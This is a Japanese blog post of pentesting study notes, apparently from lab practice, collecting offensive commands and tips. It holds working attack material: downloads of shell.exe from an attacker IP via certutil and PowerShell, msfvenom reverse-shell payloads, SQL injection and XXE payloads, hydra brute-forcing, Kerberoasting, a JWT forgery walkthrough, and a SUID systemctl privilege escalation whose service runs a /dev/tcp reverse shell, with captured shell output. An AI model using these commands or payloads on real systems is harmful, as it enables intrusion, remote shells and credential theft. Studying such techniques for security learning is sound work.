1
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 3 years have passed since last update.

White Hat への道 - Useful Commands & Tips

Last updated at Posted at 2020-09-15

White Hat Hackerになるまでの道のりを記しておく。

実際になったわけではなく、なるために勉強をすすめる際のメモを残しておこうと思う。

今回はPentestingを行う上で役に立つコマンドやTipsをここにためていけば、後で役に立つかも?との安易な気持ちで書いてみる。そのため、今後随時更新していく予定。

また参考にした動画やサイトの情報も合わせて記載しておくことにする。
もっと良いサイトや動画をご存知の方はぜひ教えていただきたい。

また、はじめに断っておくが、noobなので無意味で意味不明な行動やオプション指定などがあるかもしれない。気づいた人はぜひ指摘いただきたい。

Useful Commands

linux-command equivalent/alternative commands on Windows

cat

type <FILE_NAME>

wget

bitsadmin.exe /TRANSFER <ジョブ名> <リモートURL> <ダウンロード先>

powershell "Invoke-WebRequest -OutFile shell.exe -Uri http://10.13.6.60:8888/shell.exe"

Invoke-WebRequest -OutFile shell.exe -Uri http://10.13.6.60:8888/shell.exe

certutil.exe -urlcache -split -f "http://10.13.6.60:8888/shell.exe" shell.exe

Search files & Show contents

Windows

dir \s *FILE_NAME*
type NAME_OF_THE_FILE

参考:
https://qiita.com/asmin/items/d53e71ed98a377ca7823

NFS

showmount - show mount information for an NFS server

Linux

/usr/sbin/showmount

SMB

Linux

smbclient //[IP]/[SHARE]

Followed by the tags:
-U [name] : to specify the user
-p [port] : to specify the port

以下のようにすれば再帰的にshareのダウンロードができる

smbget -R smb://<ip>/anonymous

Simple HTTP Server

Python3

python -m http.server [port]

インターフェース情報(IP addressなど)の確認

Linux

ifconfig

ワイヤレス情報(IP addressなど)の確認

Linux

iwconfig

ユーザーの変更

Linux

su

マシンの応答確認(Ping)

Linux

ping <ip_address>
ping -c <n> <ip_address>

n: pingコマンドを発行する回数

arpキャッシュの表示

Linux

arp [-a] <host_name>

-a: BSDスタイルで表示
https://youtu.be/qlK174d_uu8?t=3797

LISTEN portの確認

Linux

netstat [-ano]

ルーティングテーブルの表示

Linux

route

管理者権限でコマンド実行

Linux

sudo

Webサーバの起動・停止

Linux

service apache2 start
service apache2 stop

OS起動時に自動で実行されるようにしたい場合

systemctl enable apache2

SSHサーバの起動・停止

Linux

service ssh start
service ssh stop

OS起動時に自動で実行されるようにしたい場合

systemctl enable ssh

dig/ whois

tctrace

特定のグループに所属するユーザーの確認

getent group

Way to crack SQLite databases

kali@kali:~/ダウンロード$ sqlite3 webapp.db 
SQLite version 3.33.0 2020-08-14 13:23:32
Enter ".help" for usage hints.
sqlite> .tables
sessions  users   
sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite> select * from users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite> 

XXE Payload example

<!DOCTYPE replace [<!ENTITY name "feast"> ]>
 <userInfo>
  <firstName>falcon</firstName>
  <lastName>&name;</lastName>
 </userInfo>
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

Permission の確認

Windows

icacls

Creating Hex Dump

Linux

xxd -p | tr -d

File Download wget

Windows

certutil.exe -urlcache -split -f http://10.13.6.60:80/win.exe

Useful Tips

ユーザー情報格納先

Linux

/etc/passwd

パスワードハッシュの格納先

Linux

/etc/shadow

sudo設定 (sudoers)

explainations

Payload Generator

msfvenom

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=[vpnIP] LPORT=[LPORT] -f exe -o reverse.exe

then run the following

> msfconsole

and

> use exploit/multi/handler
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

-p <payload> payload
lhost=<LOCAL_HOST> local host IP address
lport=<LOCAL_PORT> = the port to listen on R` export the payload in raw format

msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

-f <format> Specifies the output format. In this case that is an executable (exe)
-o <file>
The output location and filename for the generated payload.
LHOST=<IP>
Specifies the IP to connect back to.
LPORT=<port>
The port on the local machine to connect back to.

getuid

Display the created time, access time, modified time, and entry modified time of the file

timestomp <FILE_NAME> -v
  • Key logger
keyscan_start

and

keyscan_dump

Metasploit

Search for vulnerability

search cve:2009 type:exploit platform:-linux

How to add modules from exploit db

権限関連のインシデント情報格納先

Linux

/var/log/auth.log

SQL Injection Tips

Login bypass

Commonly used

' or true --
') or true–

Blind SQLi

?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+

Note: 115 is 's' in ASCII, if there's no error. If there's no obvious error, it indicates that the first letter of the database is 's'

UNION SQLi

UNION SQLi attack consists of 3 stages:

  • Finding the number of columns
  • Checking if the columns are suitable
  • Attack and get some interesting data.

Columnの数を調べる

'ORDER BY'をエラーが出るまで1ずつ増やしながら繰り返す。エラーが出る1つ前がColumnの数。

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--

UNION SELECT アタック
'UNION SELECT' と NULLのペイロードでエラーが出るまでNULLを増やしながら繰り返す。エラーが出る1つ前のNULLの数がColumn数。

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

Note: Oracleの場合は' UNION SELECT NULL FROM DUAL--とする。理由は、ORACLEの仕様でSELECT文には必ずFROMキーワードを使用する必要があるため。DUALはORACLEのBuilt-inテーブル。

悪用できそうなデータタイプのチェック
悪用できそうなデータはstringのdata typeで保存されていることが多い。この前提のもと、column数を調べたあとは、string、またはstring-compatibleなcolumnを探す。

以下のようにひとつずつcolumnの数だけstring dataをぶつけて(ここでは'a')試していく。エラーがでなければstringか互換性のあるdata typeということがわかる。

' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--

その他、有益なことが多いdata:

  • database()
  • user()
  • @@version
  • username
  • password
  • table_name
  • column_name

参考:
https://portswigger.net/web-security/sql-injection/union-attacks

ツール

Linpeas

Linux Priv Esc に使えそうな情報を一挙に調べ上げるツール

SQLMap

Tips

Burp Suiteの出力を利用する

sqlmap -r filename --dmbs=mysql --dump

Hash ハッシュ からハッシュタイプ(Hash type)を調べる

online

Python

Prefix から調べる

GoBuster(Brute-force URIs, DNS subdomains, virtual host names)

gobuster dir -uhttp://example.com -w wordlist.txt -x php,txt,html
kali@kali:~$ gobuster --help
Usage:
  gobuster [command]

Available Commands:
  dir         Uses directory/file brutceforcing mode
  dns         Uses DNS subdomain bruteforcing mode
  help        Help about any command
  vhost       Uses VHOST bruteforcing mode

Flags:
  -h, --help              help for gobuster
  -z, --noprogress        Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist

Use "gobuster [command] --help" for more information about a command.

wfuzz (Fuzzing)

FuzzingとはFancyなBrute-forceとも言えるとのこと。

Fuzzing is using security tools to automate the input of data we provide into things such as websites or software applications. Fuzzing is an extremely effective process as computers can perform laborious actions like trying to find hidden files/folders, try different usernames and passwords much quicker then a human can (and is willing to do...)

wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt localhost:80/FUZZ/note.txt
kali@kali:~$ wfuzz -h

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
*                                                      *
* Version up to 1.4c coded by:                         *
* Christian Martorella (cmartorella@edge-security.com) *
* Carlos del ojo (deepbit@gmail.com)                   *
*                                                      *
* Version 1.4d to 2.4.5 coded by:                      *
* Xavier Mendez (xmendez@edge-security.com)            *
********************************************************

Usage:  wfuzz [options] -z payload,params <url>

        FUZZ, ..., FUZnZ  wherever you put these keywords wfuzz will replace them with the values of the specified payload.
        FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.


Options:
        -h                        : This help
        --help                    : Advanced help
        --version                 : Wfuzz version details
        -e <type>                 : List of available encoders/payloads/iterators/printers/scripts

        -c                        : Output with colors
        -v                        : Verbose information.
        --interact                : (beta) If selected,all key presses are captured. This allows you to interact with the program.

        -p addr                   : Use Proxy in format ip:port:type. Repeat option for using various proxies.
                                    Where type could be SOCKS4,SOCKS5 or HTTP if omitted.

        -t N                      : Specify the number of concurrent connections (10 default)
        -s N                      : Specify time delay between requests (0 default)
        -R depth                  : Recursive path discovery being depth the maximum recursion level.
        -L, --follow              : Follow HTTP redirections

        -u url                    : Specify a URL for the request.
        -z payload                : Specify a payload for each FUZZ keyword used in the form of type,parameters,encoder.
                                    A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
                                    Encoders category can be used. ie. url
                                    Use help as a payload to show payload plugin's details (you can filter using --slice)
        -w wordlist               : Specify a wordlist file (alias for -z file,wordlist).
        -V alltype                : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
        -X method                 : Specify an HTTP method for the request, ie. HEAD or FUZZ

        -b cookie                 : Specify a cookie for the requests
        -d postdata               : Use post data (ex: "id=FUZZ&catalogue=1")
        -H header                 : Use header (ex:"Cookie:id=1312321&user=FUZZ")
        --basic/ntlm/digest auth  : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"

        --hc/hl/hw/hh N[,N]+      : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
        --sc/sl/sw/sh N[,N]+      : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
        --ss/hs regex             : Show/Hide responses with the specified regex within the content

CrackStation (for cracking password hashes)

Maltego (information gathering)

https://www.maltego.com/
一般公開されている情報を元にターゲットの情報を自動収集できる

解説動画
https://youtu.be/zemNLx0-LRw

Reverse shells

PHP

/usr/share/webshells/php/php-reverse-shell.php

Others

Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

Kali Linux でインストールされているimpacketは壊れている?らしく、一度アンインストール(purge)が必要らしい。

apt purge *impact*
cd <インストールしたいdirectory>
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .

pingで応答のあるサーバ一覧を取得する方法(shell)

スクリプト(ipsweep.sh)

#!/bin/bash

if [ "$1" == "" ]
then
echo "You forgot an IP address!"
echo "Syntax: ./sweep.sh 192.168.1"

else
for ip in `seq 1 254`; do
ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
fi

実行方法

chmod +x ipsweep.sh
./ipsweep.sh <ネットワークアドレス、、のようなもの>

(例)
./ipsweep.sh 192.168.1 > iplist.txt

後にiplist.txtをnmapのターゲットリストに使用する

hashcat

Fast password cracker, accelerated by GPU

tmux

Tplmap

Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.

The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests.

LinEnum

LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root.

Anonymous net surfing

Proxy Switcher

Easy to switch proxy servers
https://www.proxyswitcher.com/

cyber ghost VPN

VPN service
https://www.cyberghostvpn.com/en_US/

others

Tor (https://www.torproject.org)
Burp Suite (https://www.portswigger.net)
Hotspot Shield (https://www.hotspotshield.com)
Proxifier (https://www.proxifier.com)
Charles (http://www.charlesproxy.com)
Fiddler (http://www.telerik.com)
Protoport Proxy Chain (http://www.protoport.com)
ProxyCap (http://www.proxycap.com)
Module

GTFOBins

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

Have I Been Pwned

Check if you have an account that has been compromised in a data breach

OSINT

Namechk

WhatsMyName

NameChekup

sherlock

script 4 inserure deserialization OWASP 10 vulnerability

explanation Python Pickle module

dirb

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.

DIRB comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists. Also DIRB sometimes can be used as a classic CGI scanner, but remember is a content scanner not a vulnerability scanner.

DIRB main purpose is to help in professional web application auditing. Specially in security related testing. It covers some holes not covered by classic web vulnerability scanners. DIRB looks for specific web objects that other generic CGI scanners can’t look for. It doesn’t search vulnerabilities nor does it look for web contents that can be vulnerables.

dirbuster

wordlist

nikto

cheat sheet

kali@kali:~$ nikto -h http://10.10.147.61:1234/manager/html -id bob:bubbles

XSRFProbe

XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a powerful crawling engine and numerous systematic checks, it is able to detect most cases of CSRF vulnerabilities, their related bypasses and futher generate (maliciously) exploitable proof of concepts with each found vulnerability. For more info on how XSRFProbe works, see XSRFProbe Internals on wiki.

Nessus

脆弱性調査ツール。
フリーバージョンもあり。
https://www.tenable.com/products/nessus

Enum4Linux

WindowsとLinuxシステムの両方の上でのSMBを列挙するためのツール。

基本的には、Sambaパッケージに含まれるツールのラッパーで、SMB関連のターゲットから素早く情報を抜き取ることを簡単にできるようにする。

Kali Linux には標準でインストール済み。

Official Download

SecLists(collection of commom usernams, passwords(default passowrds), URLS etc.)

SecLists is a collection of common lists including usernames, passwords, URLs and much more.

hydra (online password cracking tool)

syntax

hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp

SECTION             FUNCTION
hydra                   Runs the hydra tool
-t 4                    Number of parallel connections per target
-l [user]               Points to the user who's account you're trying to compromise
-P [path to dictionary] Points to the file containing the list of possible passwords
-vV                     Sets verbose mode to very verbose, shows the login+pass combination for each attempt
[machine IP]            The IP address of the target machine
ftp / protocol          Sets the protocol
kali@kali:~$ hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.35.24 ssh
hydra -l <username> -P <full path to pass> 10.10.217.219 -t 4 ssh
hydra -l <username> -P <wordlist> 10.10.217.219 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

Breaking RSA cryptography

IDS (Intrusion Detection System) and IPS (Prevension System)

Suricata

Snort

Firewall

pfsense

Reverse Engineering

Radare2

ILSpy

This is for .NET
https://github.com/icsharpcode/ILSpy

Dotpeek

This is for .NET
https://www.jetbrains.com/decompiler/

Kerberos

Kerbrute

Bruteforce Kerberos, Active Directory

Rubeus

C# toolset for raw Kerberos interaction and abuses.

Kerberoasting w/ Impacket

Prerequisite: the attacking user must be a Service Account.

sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.191.46 -request

AS-REP roasting

Prerequisite: the attacking user must have pre-authentication disabled. (Unlike Kerberoasting, it is not required to be a Service Account.)

Reference

Powerview CheatShet

https://gist.github.com/HarmJ0y/3328d954607d71362e3c
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

SQL injection

Explanations and related articles

SQLMap Cheat Sheet

JWT (Jason Web Token)

eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA

Decode it since it is encoded by Base64 encoding.

{"typ":"JWT","alg":"HS256"}{"iss":"Paradox","iat":1610454239,"exp":1610454359,"data":{"pingu":"noots"}}v–¥ãè卅ÉÍf‰ÛòuWEF*ãåohc×Éd2-õ+‹/v$B¤xg‚Ý3õ;¥€M&»§¶Äw0ÞæÞÅèŸfÖAk 6ìÜfÁè©p áHòÅCsî"?G,,ӖÇfm¯Â›+²cF±éSªVóÄZ
B«ôÎø¶m$'V²øí<ö&ô´1†FÔ»yiݶ×=	îÅ©ŸNj„UÀøÛ;FÄÊ;TíÉMOPՑ;𛠪Ka§]ÙÀËV¸ç­bE0 7\.rØÐ&Qª—²*ôBˆ½ãèQOz«`‡¶d~ÈÉ ŸW^Žp

Change the algorithm from HS256 to AS256 and re-encode it.

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDU0MjM5LCJleHAiOjE2MTA0NTQzNTksImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.gSf3YRlqXj6OWNhckD_zWYdidvydVdFRirj5W9o-YwzXyWQeMi0M9Z0riy92JEKkeGeC3TP1_O6WATSa7pxK2xHcw3ubexeifZtYOQWugNuzcHGYPweipcCDhSPLFQ3PuIj9Hjyws05bHZm2vwptcsCuyY0ax6VMTqlYb8wzE_Wgp-CqwgF9M74tp1tJI0nVrL47Tz2JvS0MYZG1Lt5ad0Sttc9Ce4BxamfTm_qEVcD42wE7RsQfyjtU7clNT1DVkTvwmyCqS2GnXd-kHwBHLVrjnrWJ_FMCA3BVwuctjQJlGqGpeyKvRCiL3j6FFPeqtgh7ZkfsjJIJ9X-Xo4VGHA

convert the public key to hex so openssl will use it.

$ cat public.pem | xxd -p | tr -d "\\n"                                                                                                              1 ⨯
2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a  

Generate HMAC signature by supplying our public key as ASCII hex and with the token.

$ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjEwNDg4Mzg2LCJleHAiOjE2MTA0ODg1MDYsImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ" |
 openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a
(stdin)= d46b02fd2a91fbc68a0d946f6b9e5f1a9659c1902fedc39f7f05ae0ba7b12971

Convert signature (Hex to "base64 URL")

$ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('d46b02fd2a91fbc68a0d946f6b9e5f1a9659c1902fedc39f7f05ae0ba7b12971')).replace('=','')\")"
1GsC_SqR-8aKDZRva55fGpZZwZAv7cOffwWuC6exKXE

Brute force the secret

For HS256, brute-forcing the secret is possible since HS256 is a symmetric algorithm.

Cross-Site Scripting (XSS)

Explanations and related articles

https://developers.google.com/web/fundamentals/security/csp
https://www.hacksplaining.com/exercises/xss-stored

Cheat sheet

SSRF (Server-Side Request Forgery)

Bypass filters.

http://[::]:3306 or
http://:::3306

IDOR (Insercure Direct Objct Reference)

IDOR is the act of exploiting a misconfiguration in the way user input is handled, to access resources you wouldn't ordinarily be able to access.

Rainbow Table Attack

Explanations and related articles

Reverse Shell

What is it?

snipet for PHP

Cheat sheet

ICMP Shell

MIME Sniffing

Explanations and related articles

  • XSSの脆弱性につながる可能性がある
  • CSP(Content-Security-Policy)を設定していても抜け道となる可能性がある
  • ブラウザの挙動に依存する

What should we do

  • HTTP responseのContent-Type Headerを正しく設定する
  • X-Content-Type-Options Headerにnosniffを設定する(nosniffのみ設定可能)

CSRF (Cross-site Request Forgery)

Explanations and related articles

Google Dorks

Exploit を探す! (CVE - Common Vulnerabilities and Exposures)

NVD

CVEの番号形態: CVE-年-ID
例: CVE-2020-13955

Exploit DB

https://www.exploit-db.com/
Exploit をダウンロードできる

Kali Linux の searchsploit というツールで ExploitDBから検索ができる

CVE Mitre

AttackerKB

XSS Payloads ライブラリ

Privesc を目論む際にまずは確認することリスト

LinEnum で情報収集する

  • kernelに脆弱性はないか
  • センシティブなファイルのread/write権限の設定ミスはないか
  • SUID/GUIDでrootなど利用できるものはないか? rootやrootグループなど
  • sudo -l でできることを確認したか (vi がrootで実行できる、NOPASSWD設定など)
    (vi がroot権限で実行できる → vi 実行 ":!sh" でroot権限のshell)
  • crontabのコマンドで怪しいもの、rootで動くものを利用できないか (cronはrootで実行される)
  • root権限は誰がもっているか
  • PATHの書き換えはできないか? (PATH上書きでSUIDのバイナリーを読み込むもとを変更する)

例: SUIDのついているファイル検索

find / -perm -u=s -type f 2>/dev/null

例: /etc/passwdのエントリー(パスワードフィールド)作成(MD5)

openssl passwd -1 -salt [salt] [password]

Cron で privesc (by wildcard)

Useful チェックリスト

systemctl にSUIDがセットされていることがわかった場合

systemctlにSUIDがセットされている場合、rootへの権限昇格ができる(by reverse_shell)

kali@kali:~$ cat root.service 
[Unit]
Description=roooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.13.6.60/5555 0>&1'

[Install]
WantedBy=multi-user.target
kali@kali:~/ダウンロード/php-reverse-shell-master$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.13.6.60] from (UNKNOWN) [10.10.28.226] 39414
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 04:22:53 up 3 min,  0 users,  load average: 0.02, 0.05, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /tmp
$ wget http://10.13.6.60:6666/root.service
--2020-11-15 04:23:30--  http://10.13.6.60:6666/root.service
Connecting to 10.13.6.60:6666... connected.
HTTP request sent, awaiting response... 200 OK
Length: 166 [application/octet-stream]
Saving to: 'root.service'

     0K                                                       100%  557K=0s

2020-11-15 04:23:31 (557 KB/s) - 'root.service' saved [166/166]

$ /bin/systemctl enable /tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /tmp/root.service.
Created symlink from /etc/systemd/system/root.service to /tmp/root.service.
$ /bin/systemctl start root

How HTTPS works

What is Enumeration?

Payload Cheat Sheet

SMTP Enum

use metasploit's 'smtp_enum'

Example:

msf6 auxiliary(scanner/smtp/smtp_version) > search smtp_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/smtp/smtp_enum                   normal  No     SMTP User Enumeration Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_enum

msf6 auxiliary(scanner/smtp/smtp_enum) > options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                            Required  Description
   ----       ---------------                                            --------  -----------
   RHOSTS     10.10.35.24                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      25                                                         yes       The target port (TCP)
   THREADS    1                                                          yes       The number of concurrent threads (max one per host)
   UNIXONLY   true                                                       yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /home/kali/SecLists/Usernames/top-usernames-shortlist.txt  yes       The file that contains a list of probable users accounts.

MySQL Enum

msf6 > search mysql_sql

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/admin/mysql/mysql_sql                   normal  No     MySQL SQL Generic Query


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_sql

msf6 auxiliary(admin/mysql/mysql_sql) > options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306              yes       The target port (TCP)
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as

msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.177.233
RHOSTS => 10.10.177.233
msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.177.233

[*] 10.10.177.233:3306 - Sending statement: 'select version()'...
[*] 10.10.177.233:3306 -  | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
SQL => show databases
msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.177.233

[*] 10.10.177.233:3306 - Sending statement: 'show databases'...
[*] 10.10.177.233:3306 -  | information_schema |
[*] 10.10.177.233:3306 -  | mysql |
[*] 10.10.177.233:3306 -  | performance_schema |
[*] 10.10.177.233:3306 -  | sys |
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_sql) > 

Schema Dump

msf6 auxiliary(scanner/mysql/mysql_schemadump) > options

Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
   PASSWORD         password         no        The password for the specified username
   RHOSTS           10.10.177.233    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            3306             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)
   USERNAME         root             no        The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_schemadump) > 

Hash Dump

msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/analyze/crack_databases                        normal  No     Password Cracker: Databases
   1  auxiliary/scanner/mysql/mysql_hashdump                   normal  No     MYSQL Password Hashdump


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/mysql/mysql_hashdump

msf6 auxiliary(scanner/mysql/mysql_schemadump) > use 1
msf6 auxiliary(scanner/mysql/mysql_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.10.177.233    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  root             no        The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_hashdump)

samdump2

SAM(Security Account Manager) は database ファイルの一つ。
python2 が生きていたころは、
https://github.com/Neohapsis/creddump7.git
が使えていたと思われるが、2020年12月現在に試してみたところうまく行かない。
(追記)
下記をインストールすれば動作することが判明

  • pip のインストール
curl https://bootstrap.pypa.io/get-pip.py | sudo python -
sudo pip install pycrypto

代替案の一つとして見つけたツールがこのsamdump2。kali linuxには標準で入っているが、windows10には適用できなそう。

└─$ samdump2 SYSTEM SAM                                                                                                                              255 ⨯
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
